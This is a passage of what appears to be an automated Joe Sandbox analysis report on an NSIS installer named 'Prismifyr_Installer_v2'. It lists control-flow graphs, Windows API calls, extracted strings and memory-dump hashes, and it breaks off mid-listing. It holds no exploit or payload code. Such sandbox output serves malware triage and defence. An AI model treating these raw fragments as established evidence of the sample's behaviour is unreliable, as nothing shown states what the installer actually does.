4040d9-4040dd 278->279 280 4040fc-404110 DestroyWindow 279->280 281 4040df-4040e5 279->281 280->215 282 404116-404143 CreateDialogParamW 280->282 281->206 283 4040eb-4040f1 281->283 282->215 284 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 282->284 283->207 285 4040f7 283->285 284->206 290 4041a2-4041b5 ShowWindow call 40427d 284->290 285->206 292 4041ba 290->292 292->215
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403EEF
                                                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00450248,?,00450248,00000000), ref: 004040A6
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00450248), ref: 004040BA
                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                                                                                                                                                                          • String ID: <#j
                                                                                                                                                                                                                          • API String ID: 3906175533-3254663873
                                                                                                                                                                                                                          • Opcode ID: fc0f4d7be1e4c82c86fade982caad82dc734dafc7249948e3003efd3e17736fb
                                                                                                                                                                                                                          • Instruction ID: ebd8885eb79f40fe398f9982bcc50e4b60f6275a3dc5f5776bcae5bce4ead0d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc0f4d7be1e4c82c86fade982caad82dc734dafc7249948e3003efd3e17736fb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFC1D5B1500304ABDB206F61EE88E2B3A78FB95346F00053EF645B51F1CB799891DB6E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 293 4039aa-4039c2 call 406694 296 4039c4-4039d4 call 406201 293->296 297 4039d6-403a0d call 406188 293->297 306 403a30-403a59 call 403c80 call 405c97 296->306 302 403a25-403a2b lstrcatW 297->302 303 403a0f-403a20 call 406188 297->303 302->306 303->302 311 403aeb-403af3 call 405c97 306->311 312 403a5f-403a64 306->312 318 403b01-403b26 LoadImageW 311->318 319 403af5-403afc call 4062dc 311->319 312->311 313 403a6a-403a92 call 406188 312->313 313->311 320 403a94-403a98 313->320 322 403ba7-403baf call 40140b 318->322 323 403b28-403b58 RegisterClassW 318->323 319->318 324 403aaa-403ab6 lstrlenW 320->324 325 403a9a-403aa7 call 405bbc 320->325 336 403bb1-403bb4 322->336 337 403bb9-403bc4 call 403c80 322->337 326 403c76 323->326 327 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 323->327 331 403ab8-403ac6 lstrcmpiW 324->331 332 403ade-403ae6 call 405b8f call 4062ba 324->332 325->324 330 403c78-403c7f 326->330 327->322 331->332 335 403ac8-403ad2 GetFileAttributesW 331->335 332->311 339 403ad4-403ad6 335->339 340 403ad8-403ad9 call 405bdb 335->340 336->330 346 403bca-403be4 ShowWindow call 406624 337->346 347 403c4d-403c4e call 4053f5 337->347 339->332 339->340 340->332 352 403bf0-403c02 GetClassInfoW 346->352 353 403be6-403beb call 406624 346->353 351 403c53-403c55 347->351 354 403c57-403c5d 351->354 355 403c6f-403c71 call 40140b 351->355 359 403c04-403c14 GetClassInfoW RegisterClassW 352->359 360 403c1a-403c3d DialogBoxParamW call 40140b 352->360 353->352 354->336 356 403c63-403c6a call 40140b 354->356 355->326 356->336 359->360 364 403c42-403c4b call 4038fa 360->364 364->330
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                            • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004DB000,00450248,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450248,00000000,00000002,004DF000,76233420,004CB000,00000000), ref: 00403A2B
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,004CF000,004DB000,00450248,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450248,00000000,00000002,004DF000), ref: 00403AAB
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,004CF000,004DB000,00450248,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450248,00000000), ref: 00403ABE
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403AC9
                                                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004CF000), ref: 00403B12
                                                                                                                                                                                                                            • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                                                          • RegisterClassW.USER32(00472E80), ref: 00403B4F
                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00472E80), ref: 00403BFE
                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00472E80), ref: 00403C0B
                                                                                                                                                                                                                          • RegisterClassW.USER32(00472E80), ref: 00403C14
                                                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                          • API String ID: 1975747703-564491471
                                                                                                                                                                                                                          • Opcode ID: f1b2be5f89fac0cbf9958f47fdf3d8daba4c0bfed37b59ff3d0d792caf125e20
                                                                                                                                                                                                                          • Instruction ID: e946f9b6b947081a315c1f95bc525aa973ad4f651662e5f5477bf26fdb3bf1de
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b2be5f89fac0cbf9958f47fdf3d8daba4c0bfed37b59ff3d0d792caf125e20
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B361C8302407007ED720AF669E45E2B3A6CEB8474AF40417FF985B51E2DBBD5951CB2E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 367 4062dc-4062e7 368 4062e9-4062f8 367->368 369 4062fa-406310 367->369 368->369 370 406316-406323 369->370 371 406528-40652e 369->371 370->371 374 406329-406330 370->374 372 406534-40653f 371->372 373 406335-406342 371->373 376 406541-406545 call 4062ba 372->376 377 40654a-40654b 372->377 373->372 375 406348-406354 373->375 374->371 378 406515 375->378 379 40635a-406398 375->379 376->377 383 406523-406526 378->383 384 406517-406521 378->384 381 4064b8-4064bc 379->381 382 40639e-4063a9 379->382 387 4064be-4064c4 381->387 388 4064ef-4064f3 381->388 385 4063c2 382->385 386 4063ab-4063b0 382->386 383->371 384->371 392 4063c9-4063d0 385->392 386->385 389 4063b2-4063b5 386->389 390 4064d4-4064e0 call 4062ba 387->390 391 4064c6-4064d2 call 406201 387->391 393 406502-406513 lstrlenW 388->393 394 4064f5-4064fd call 4062dc 388->394 389->385 396 4063b7-4063ba 389->396 405 4064e5-4064eb 390->405 391->405 398 4063d2-4063d4 392->398 399 4063d5-4063d7 392->399 393->371 394->393 396->385 401 4063bc-4063c0 396->401 398->399 403 406412-406415 399->403 404 4063d9-406400 call 406188 399->404 401->392 406 406425-406428 403->406 407 406417-406423 GetSystemDirectoryW 403->407 417 4064a0-4064a3 404->417 418 406406-40640d call 4062dc 404->418 405->393 409 4064ed 405->409 411 406493-406495 406->411 412 40642a-406438 GetWindowsDirectoryW 406->412 410 406497-40649b 407->410 414 4064b0-4064b6 call 40654e 409->414 410->414 419 40649d 410->419 411->410 416 40643a-406444 411->416 412->411 414->393 422 406446-406449 416->422 423 40645e-406474 SHGetSpecialFolderLocation 416->423 417->414 420 4064a5-4064ab lstrcatW 417->420 418->410 419->417 420->414 422->423 426 40644b-406452 422->426 427 406476-40648d SHGetPathFromIDListW CoTaskMemFree 423->427 428 40648f 423->428 429 40645a-40645c 426->429 427->410 427->428 428->411 429->410 429->423
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Remove folder: ,00002000), ref: 0040641D
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00002000,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,?,00405359,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000), ref: 00406430
                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00405359,0042CE00,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,?,00405359,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000), ref: 0040646C
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(0042CE00,Remove folder: ), ref: 0040647A
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(0042CE00), ref: 00406485
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,?,00405359,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000), ref: 00406503
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                          • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                          • API String ID: 717251189-1389394178
                                                                                                                                                                                                                          • Opcode ID: 412c271bb9d070f278564469311d6f605cf1b48e62db3e13451b1dc2679c3c4f
                                                                                                                                                                                                                          • Instruction ID: deb4280fb9253f119c0dee44fead77f8699473dbe43bed35a1e393a154a8df3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 412c271bb9d070f278564469311d6f605cf1b48e62db3e13451b1dc2679c3c4f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87612371A00115AADF209F64DC44BAE37A5EF45318F22803FE907B62D0D77D9AA1C75E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 430 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 433 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 430->433 434 402f2d-402f32 430->434 442 403052-403060 call 402e79 433->442 443 402f6b 433->443 435 40310f-403113 434->435 449 403062-403065 442->449 450 4030b5-4030ba 442->450 445 402f70-402f87 443->445 447 402f89 445->447 448 402f8b-402f94 call 403331 445->448 447->448 456 402f9a-402fa1 448->456 457 4030bc-4030c4 call 402e79 448->457 452 403067-40307f call 403347 call 403331 449->452 453 403089-4030b3 GlobalAlloc call 403347 call 403116 449->453 450->435 452->450 478 403081-403087 452->478 453->450 476 4030c6-4030d7 453->476 461 402fa3-402fb7 call 405d6b 456->461 462 40301d-403021 456->462 457->450 467 40302b-403031 461->467 481 402fb9-402fc0 461->481 466 403023-40302a call 402e79 462->466 462->467 466->467 473 403040-40304a 467->473 474 403033-40303d call 406787 467->474 473->445 477 403050 473->477 474->473 483 4030d9 476->483 484 4030df-4030e4 476->484 477->442 478->450 478->453 481->467 482 402fc2-402fc9 481->482 482->467 486 402fcb-402fd2 482->486 483->484 487 4030e5-4030eb 484->487 486->467 488 402fd4-402fdb 486->488 487->487 489 4030ed-403108 SetFilePointer call 405d6b 487->489 488->467 490 402fdd-402ffd 488->490 493 40310d 489->493 490->450 492 403003-403007 490->492 494 403009-40300d 492->494 495 40300f-403017 492->495 493->435 494->477 494->495 495->467 496 403019-40301b 495->496 496->467
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004E7000,00002000,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                                                                                            • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(004E7000,00402F1D,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                            • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004EB000,00000000,004D7000,004D7000,004E7000,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • soft, xrefs: 00402FCB
                                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                                                                                                          • Null, xrefs: 00402FD4
                                                                                                                                                                                                                          • Inst, xrefs: 00402FC2
                                                                                                                                                                                                                          • Error launching installer, xrefs: 00402F2D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                          • API String ID: 4283519449-527102705
                                                                                                                                                                                                                          • Opcode ID: 6fdf7a3c576b274adc95fc68e3ac1b8cc101307f87f608dfe476064d1f7918cb
                                                                                                                                                                                                                          • Instruction ID: d807cc789e5c0b6659aec278a7977cb1897ccc82e3fedab9e592eb30a9b28e48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fdf7a3c576b274adc95fc68e3ac1b8cc101307f87f608dfe476064d1f7918cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23511671901205ABDB20AF61DD85B9F7FACEB0431AF20403BF914B62D5C7789E818B9D

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 561 40176f-401794 call 402c41 call 405c06 566 401796-40179c call 4062ba 561->566 567 40179e-4017b0 call 4062ba call 405b8f lstrcatW 561->567 572 4017b5-4017b6 call 40654e 566->572 567->572 576 4017bb-4017bf 572->576 577 4017c1-4017cb call 4065fd 576->577 578 4017f2-4017f5 576->578 586 4017dd-4017ef 577->586 587 4017cd-4017db CompareFileTime 577->587 580 4017f7-4017f8 call 405d8b 578->580 581 4017fd-401819 call 405db0 578->581 580->581 588 40181b-40181e 581->588 589 40188d-4018b6 call 405322 call 403116 581->589 586->578 587->586 590 401820-40185e call 4062ba * 2 call 4062dc call 4062ba call 405920 588->590 591 40186f-401879 call 405322 588->591 603 4018b8-4018bc 589->603 604 4018be-4018ca SetFileTime 589->604 590->576 623 401864-401865 590->623 601 401882-401888 591->601 605 402ace 601->605 603->604 607 4018d0-4018db CloseHandle 603->607 604->607 611 402ad0-402ad4 605->611 608 4018e1-4018e4 607->608 609 402ac5-402ac8 607->609 612 4018e6-4018f7 call 4062dc lstrcatW 608->612 613 4018f9-4018fc call 4062dc 608->613 609->605 619 401901-4022fc call 405920 612->619 613->619 619->609 619->611 623->601 625 401867-401868 623->625 625->591
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,ExecShellAsUser,004D3000,?,?,00000031), ref: 004017B0
                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,ExecShellAsUser,ExecShellAsUser,00000000,00000000,ExecShellAsUser,004D3000,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                            • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00002000,00403460,00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000,0042CE00,762323A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                            • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\,00000000,0042CE00,762323A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
